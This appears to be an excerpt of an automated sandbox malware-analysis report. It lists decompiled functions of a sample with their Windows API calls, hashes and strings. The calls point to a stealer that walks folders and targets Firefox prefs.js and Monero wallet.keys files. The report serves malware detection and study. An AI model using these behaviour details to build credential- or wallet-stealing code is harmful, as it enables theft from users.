                        • Opcode Fuzzy Hash: de14f62c0862e157c18eb24b00989fe5dfebd63087b63a9e23c9ad4d94914929
                        • Instruction Fuzzy Hash: 5C5137B5A00218EBCB24FB70DC49EEA777CBB48300F445598F659A6044DB75EB85CF51
                        APIs
                        • wsprintfA.USER32 ref: 00E2ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 00E2ED55
                        • StrCmpCA.SHLWAPI(?,00E41538), ref: 00E2EDAB
                        • StrCmpCA.SHLWAPI(?,00E4153C), ref: 00E2EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2F2AE
                        • FindClose.KERNEL32(000000FF), ref: 00E2F2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 3c6319c7d4c05c3674c99439c0db08c3ef47c730405fe9615a52a54914d707f3
                        • Instruction ID: 2b8400c9bfab353a1e5df8960ebce96923768aa6fce813812ab76dcc77cfba85
                        • Opcode Fuzzy Hash: 3c6319c7d4c05c3674c99439c0db08c3ef47c730405fe9615a52a54914d707f3
                        • Instruction Fuzzy Hash: 0CE10172911118AADB18FB60DC9AEEE77B8AF54300F4451F9B44A72052EE306FCACF51
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E415B8,00E40D96), ref: 00E2F71E
                        • StrCmpCA.SHLWAPI(?,00E415BC), ref: 00E2F76F
                        • StrCmpCA.SHLWAPI(?,00E415C0), ref: 00E2F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2FAB1
                        • FindClose.KERNEL32(000000FF), ref: 00E2FAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 759dbd67d96b74da33c4ed19601ddf311f7bb8a33a26edfab5518e519ef9f079
                        • Instruction ID: 3862e49a5b9dc122275264831a651bb304cbc27f8a66904206723fe35858d55f
                        • Opcode Fuzzy Hash: 759dbd67d96b74da33c4ed19601ddf311f7bb8a33a26edfab5518e519ef9f079
                        • Instruction Fuzzy Hash: 3FB154729001189BCB28FF60DC99BEE77B9AF94300F4451B9E44AB7141EF356B89CB91
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E4510C,?,?,?,00E451B4,?,?,00000000,?,00000000), ref: 00E21923
                        • StrCmpCA.SHLWAPI(?,00E4525C), ref: 00E21973
                        • StrCmpCA.SHLWAPI(?,00E45304), ref: 00E21989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E21D40
                        • DeleteFileA.KERNEL32(00000000), ref: 00E21DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E21E20
                        • FindClose.KERNEL32(000000FF), ref: 00E21E32
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: dc98af9c0f2c1a38c8c2eeadf43dc481e4da5346d0bf382fb37b18a8467e8369
                        • Instruction ID: a788a0bada7b81aeb1962abd0babeedb98e22a4ad31a052f97181cda620a3dc7
                        • Opcode Fuzzy Hash: dc98af9c0f2c1a38c8c2eeadf43dc481e4da5346d0bf382fb37b18a8467e8369
                        • Instruction Fuzzy Hash: 8012EE72910118ABDB19FB60DC9AAEE77B8AF54300F4461E9B14676091EF306FC9CF91
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E40C2E), ref: 00E2DE5E
                        • StrCmpCA.SHLWAPI(?,00E414C8), ref: 00E2DEAE
                        • StrCmpCA.SHLWAPI(?,00E414CC), ref: 00E2DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2E3E0
                        • FindClose.KERNEL32(000000FF), ref: 00E2E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: 2e31b3af1e3a465fb2046e41a42580a9388c6b4e31778362fd109ec05f7f43d0
                        • Instruction ID: 8594d2199f2047b4c38d30f9adf6ed50e0a33fdf899d08bd52926101f0759a53
                        • Opcode Fuzzy Hash: 2e31b3af1e3a465fb2046e41a42580a9388c6b4e31778362fd109ec05f7f43d0
                        • Instruction Fuzzy Hash: 6CF1CF72914118AADB19FB60DC99EEE77B8BF54300F4461E9A05A72091EF306FCACF51
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E414B0,00E40C2A), ref: 00E2DAEB
                        • StrCmpCA.SHLWAPI(?,00E414B4), ref: 00E2DB33
                        • StrCmpCA.SHLWAPI(?,00E414B8), ref: 00E2DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2DDCC
                        • FindClose.KERNEL32(000000FF), ref: 00E2DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: a8e7b2197a839b9437c4dc752d34c1844a9bde6488dc0d559d3965fcc3986433
                        • Instruction ID: 40cb7aab52840d911ac597075beabec4b551f4ad59b4116abb34c2b6765a170d
                        • Opcode Fuzzy Hash: a8e7b2197a839b9437c4dc752d34c1844a9bde6488dc0d559d3965fcc3986433
                        • Instruction Fuzzy Hash: 8A916972900114ABCB14FF70EC9A9ED77BCAF94300F4496A9F946B7141EE349B49CB92
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,00E405AF), ref: 00E37BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00E37BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00E37C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E37C62
                        • LocalFree.KERNEL32(00000000), ref: 00E37D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 6d8be36839c605a1a4c5edbf6d12f0d1aa3c5bb1524db95205ad1741f8de2b15
                        • Instruction ID: b38c009a5bd61397ffe6aa73f26f9517b8f60244fe7044277092a9d08d8a30b2
                        • Opcode Fuzzy Hash: 6d8be36839c605a1a4c5edbf6d12f0d1aa3c5bb1524db95205ad1741f8de2b15
                        • Instruction Fuzzy Hash: CB413A71940218ABDB24DB94DC9DBEEBBB4FB48700F205199E14972181DB342F85CFA1
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E40D73), ref: 00E2E4A2
                        • StrCmpCA.SHLWAPI(?,00E414F8), ref: 00E2E4F2
                        • StrCmpCA.SHLWAPI(?,00E414FC), ref: 00E2E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: 8005ec347e257e80a84935d9de92ca392a42bcac4b066d4a67b247f552a029a1
                        • Instruction ID: acf5e6499ab20a62d9184dba949a1f26f8ec5ec68466625b0ffdf249e98e8b22
                        • Opcode Fuzzy Hash: 8005ec347e257e80a84935d9de92ca392a42bcac4b066d4a67b247f552a029a1
                        • Instruction Fuzzy Hash: BE126532910118AADB18FB60DC9EEED77B8AF54300F4451F9B54A72191EE346FC9CB92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $Vw?$p8w}$zduY$zV$gsY$yo_
                        • API String ID: 0-1116265706
                        • Opcode ID: acb2a552c45614a87ad5936ad1400404a0fce655a930ee5ca8766d34c331a168
                        • Instruction ID: 36c1b2295e80808bf81ec404544a9acdeabe016c22de111bfa1009d5f784424a
                        • Opcode Fuzzy Hash: acb2a552c45614a87ad5936ad1400404a0fce655a930ee5ca8766d34c331a168
                        • Instruction Fuzzy Hash: CFB219F36082049FE304AE2DEC8567AFBE9EFD4720F1A493DE6C5C3744EA7558058692
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 4d}$=$mp$Ul#$hj6w$y;{Z$a#7
                        • API String ID: 0-388246791
                        • Opcode ID: bf66c70e24cd64fcdf007d4cf71822db3b08ff730589b308db25794536052364
                        • Instruction ID: f0296ad532216821bb0c73d1f7b8cb14a75908ac3a78c0abbad8e3a670f94245
                        • Opcode Fuzzy Hash: bf66c70e24cd64fcdf007d4cf71822db3b08ff730589b308db25794536052364
                        • Instruction Fuzzy Hash: EEB2D4F36082009FE3046E2DEC85A7ABBE6EFD4720F1A493DE6C5C7744E63598058697
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E29AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,00E24EEE,00000000,?), ref: 00E29B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E29B2A
                        • LocalFree.KERNEL32(?,?,?,?,00E24EEE,00000000,?), ref: 00E29B3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID: N
                        • API String ID: 4291131564-1689755984
                        • Opcode ID: ebf359ce369d3b653430c58ed7dcd81470e47e3b50143de1335149c2f0bc0b06
                        • Instruction ID: d7a12ada816bb25c4996ab0c80abe8d6315039dfe93ad9e749bea75412a4cd0e
                        • Opcode Fuzzy Hash: ebf359ce369d3b653430c58ed7dcd81470e47e3b50143de1335149c2f0bc0b06
                        • Instruction Fuzzy Hash: FE11A4B4240208EFEB10DF64D895FAA77B5FB89704F209058F915AB394C776A901DB94
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: )[\z$1^}i$=kgw$Q>^1$z'|
                        • API String ID: 0-4030652101
                        • Opcode ID: 902a78efb30863ba22c54c5ea0d1bd54a57543de7a8ef7f3f90a592b04a3f8e4
                        • Instruction ID: c61dd034b1c0645dda2a0fee242c2c706b3484c5bbe5a980a759f2476685d48c
                        • Opcode Fuzzy Hash: 902a78efb30863ba22c54c5ea0d1bd54a57543de7a8ef7f3f90a592b04a3f8e4
                        • Instruction Fuzzy Hash: C0B219F360C204AFE3046E2DEC8567AFBE9EF94720F1A453DEAC5C7744EA3558018696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
